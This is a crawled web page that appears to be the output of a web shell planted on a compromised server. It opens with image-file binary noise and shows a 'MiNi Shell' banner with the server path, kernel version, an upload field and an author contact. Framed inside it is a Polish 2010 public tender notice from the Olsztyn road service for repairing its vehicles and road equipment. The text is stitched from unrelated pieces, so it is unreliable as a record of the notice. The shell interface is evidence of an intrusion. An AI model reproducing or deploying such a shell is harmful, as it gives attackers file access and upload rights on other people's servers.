JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100331/70405-N-2010.html

<p class="kh_header"><b>Olsztyn: Naprawy pojazdów i sprzętu, eksploatowanych przez obwód Drogowy nr 1 w Olsztynku, z podziałem na zadania:
- ZADANIE NR 1- naprawa samochodów osobowych i dostawczych;
- ZADANIE NR 2- naprawa samochodów ciężarowych i pojazdów specjalnych;
- ZADANIE NR 3- naprawa ciągników i przyczep;
- ZADANIE NR 4- naprawa maszyn roboczych i sprzętu.</b><br>
<b>Numer ogłoszenia: 70405 - 2010; data zamieszczenia: 31.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Służba Drogowa w Olsztynie , ul. Cementowa 3, 10-429 Olsztyn, woj. warmińsko-mazurskie, tel. 089 535 66 30, faks 089 535 66 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy pojazdów i sprzętu, eksploatowanych przez obwód Drogowy nr 1 w Olsztynku, z podziałem na zadania:
- ZADANIE NR 1- naprawa samochodów osobowych i dostawczych;
- ZADANIE NR 2- naprawa samochodów ciężarowych i pojazdów specjalnych;
- ZADANIE NR 3- naprawa ciągników i przyczep;
- ZADANIE NR 4- naprawa maszyn roboczych i sprzętu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są naprawy wynikające z bieżącej eksploatacji pojazdów mechanicznych oraz sprzętu do zimowego i letniego utrzymania dróg wraz z częściami zamiennymi, oraz ich pełna obsługa serwisowa, przygotowująca m. in. do przeglądów technicznych, będących na wyposażeniu Obwodu Drogowego Nr 1 w Olsztynku , ul. Poranna 36, z podziałem na zadania:
- zadanie Nr 1 - naprawa samochodów osobowych i dostawczych
- zadanie Nr 2 - naprawa samochodów ciężarowych i pojazdów specjalnych
- zadanie Nr 3 - naprawa ciągników i przyczep
- zadanie Nr 4 - naprawa maszyn roboczych i sprzętu 
zgodnie z charakterystyką techniczną przedmiotu zamówienia stanowiącą załącznik Nr 1 do SIWZ
2.	Naprawy wykonywane są na żądanie Zamawiającego, na podstawie przedstawionego przez Zamawiającego zlecenia naprawy, zawierającego przewidywany zakres czynności naprawczych do wykonania. Wzór zlecenia naprawy stanowi załącznik Nr 2 do SIWZ.
3.	Na życzenie Zamawiającego zostaną określone szacunkowe koszty naprawy. Koszty szacunkowe to bezpłatna forma przewidywanych kosztów usługi na podstawie stanu pojazdu bądź sprzętu dającego się ustalić w czasie czynności przyjęcia z określeniem kosztów robocizny i części według cenników obowiązujących w momencie szacowania.
4.	Jeżeli podczas wykonywania usługi ujawni się konieczność wykonania dodatkowych czynności naprawczych Wykonawca poinformuje o tym Zamawiającego. W takim przypadku wykonanie czynności dodatkowych nastąpi dopiero po ustnym zatwierdzeniu przez Zamawiającego (kierownika lub majstra obwodu drogowego) rozszerzenia zakresu naprawy. W przypadku gdy stwierdzone zostaną usterki, które nie były zlecone do naprawy a mają wpływ na bezpieczeństwo pojazdu bądź urządzenia, Wykonawca uprzedzi  Zamawiającego o konieczności usunięcia takich  usterek.
5.	Wykonawca będzie wykonywał zamówienie przy użyciu własnych materiałów, urządzeń i narzędzi oraz będzie zaopatrywał się w części zamienne we własnym zakresie.
6.	Zamawiający wymaga stosowania przy przeglądach, naprawach, części zamiennych i materiałów eksploatacyjnych spełniających normy zalecane przez producenta. Materiały eksploatacyjne oraz części zamienne muszą być fabrycznie nowe, nie noszące śladów uszkodzeń, nie mogą być regenerowane.
7.	Części wymienione podczas naprawy Wykonawca przedstawia do wglądu Zamawiającemu.
8.	Przeglądy pojazdów będą wykonywane zgodnie z częstotliwością i zakresem wynikającym z Warunków eksploatacji i przeglądów okresowych dla każdego samochodu i maszyn określonym przez  producenta.
9.	Zamawiający wymaga od Wykonawcy wykonywania usług zgodnie z normami czasowymi wykonania napraw określonymi w katalogach norm czasowych aktualnie obowiązujących u Wykonawcy oraz każdorazowego okazania do wglądu katalogu norm czasowych na żądania Zamawiającego.
10.	Zgłoszony do naprawy pojazd lub sprzęt zostanie przyjęty przez Wykonawcę w terminie 1 dnia roboczego od zgłoszenia. Wykonawca niezwłocznie po przyjęciu rozpocznie ich naprawę, używając części zamiennych według potrzeb. 
11.	Zamawiający wymaga od Wykonawcy udzielenia 12 miesięcy gwarancji na wykonaną naprawę, licząc od dnia odbioru przedmiotu naprawy.
12.	W dniu wydania naprawionego sprzętu lub pojazdu winny być wypełnione przez Wykonawcę formularze dostarczone przez Zamawiającego:
- karta naprawy pojazdu za wykonaną usługę i wymienione części, której wzór stanowi Załącznik Nr 3 do SIWZ
- zlecenie naprawy
 stanowiące załączniki pod fakturę VAT.
13.	Zapłata należności Wykonawcy nastąpi na podstawie otrzymanej przez Zamawiającego poprawnie wystawionej faktury (fakturę należy wystawić w terminie 7 dni od daty wydania pojazdu z naprawy). Należne wykonawcy wynagrodzenia będą przekazywane przelewem na rachunek bankowy wskazany w fakturze, w terminie 14 dni od daty otrzymania faktury.
14	Nazwa i kod określony we Wspólnym Słowniku Zamówień
Główny przedmiot: CPV: 50100000-6- usługi w zakresie napraw i konserwacji pojazdów i podobnego sprzętu oraz podobne usługi; 50112000-3, usługi w zakresie napraw i konserwacji samochodów.
15.	Szczegółowy opis przedmiotu zamówienia został zawarty w: 
- charakterystyce przedmiotu zamówienia (dla każdego zadania), stanowiącej załącznik Nr 1 do SIWZ
- projekcie umowy, który stanowi dodatek Nr 4 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 50.11.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie na podstawie art 22 ust. 1 ustawy Pzp.
2. Formularz oferty wraz z formularzem cenowym.
3. Pełnomocnictwa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80.00</li>
<li>2 - Odległość zakładu naprawczego od miejsca garażowania pojazdów - 10.00</li>
<li>3 - Upust na części zamienne - 10.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-olsztynski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Służba Drogowa 
ul. Cementowa 3
10-429 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2010 godzina 09:00, miejsce: Siedziba Zamawiającego: Olsztyn, ul. Cementowa 3, sekretariat IV piętro pok. 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1- naprawa samochodów osobowych i dostawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dotyczą następującego sprzętu garażowanego w Olsztynku przy ulicy Porannej 36:
- samochód osobowy: 	Fiat Seicento rok prod.1999
- samochody dostawcze:	 Lublin 3322 rok prod. 1999
 				Żuk A07 rok prod.1995
2.	Zakład naprawczy nie może znajdować się dalej niż 30 km od miejsca garażowania pojazdów i sprzętu.
3.	W przypadku konieczności, Zamawiający w ramach niniejszego zamówienia może zlecić naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w posiadaniu Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 50.11.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. odległość zakładu naprawczego od miejsca garazowania pojazdów - 10.00</li>
<li>3. upust na części zamienne - 10.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2-naprawa samochodów ciężarowych i pojazdów specjalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Naprawy dotyczą następującego sprzętu garażowanego w Olsztynku przy ulicy Porannej 36:
- samochody ciężarowe: Mercedes 1617 rok prod.1989
Mercedes Unimog 404 rok prod.1988
Man 8150 rok prod. 1990
2.	Zakład naprawczy nie może znajdować się dalej niż 40 km od miejsca garażowania pojazdów i sprzętu.
3.	W przypadku konieczności, Zamawiający w ramach niniejszego zamówienia może zlecić naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w posiadaniu Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 50.11.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. odległość zakładu naprawczego od miejsca garażowania pojazdów - 10.00</li>
<li>3. upust na części zamienne - 10.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3-naprawa ciągników i przyczep.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Naprawy dotyczą następującego sprzętu garażowanego w Olsztynku przy ulicy Porannej 36:
- ciągniki rolnicze: 	Ursus C-360 rok prod.1984
Zefir rok prod. 2008
INTER HARV.-IHC(D) rok prod.1980
- przyczepy rolnicze
2.	Zakład naprawczy nie może znajdować się dalej niż 40 km od miejsca garażowania pojazdów i sprzętu.
3.	W przypadku konieczności, Zamawiający w ramach niniejszego zamówienia może zlecić naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w posiadaniu Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 50.11.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. odległość zakładu naprawczego od miejsca garażowania pojazdów - 10.00</li>
<li>3. upust na części zamienne - 10.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4- naprawa maszyn roboczych i sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Naprawy dotyczą następującego sprzętu garażowanego w Olsztynku przy ulicy Porannej 36:
- sprzęt do letniego i zimowego utrzymania dróg (zagęszczarka płytowa, rębak do gałęzi, piaskarka, karczownik, skrapiarka, przecinarka do asfaltu, ścinarka do poboczy, pług wirnikowy, pług lemieszowy, ładowacz przedni, kosiarka wysięgnikowa) 
2.	Zakład naprawczy nie może znajdować się dalej niż 40 km od miejsca garażowania pojazdów i sprzętu.
3.	W przypadku konieczności, Zamawiający w ramach niniejszego zamówienia może zlecić naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w posiadaniu Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 50.11.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. odległość zakładu naprawczego od miejsca garażowania pojazdów - 10.00</li>
<li>3. upust na części zamienne - 10.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com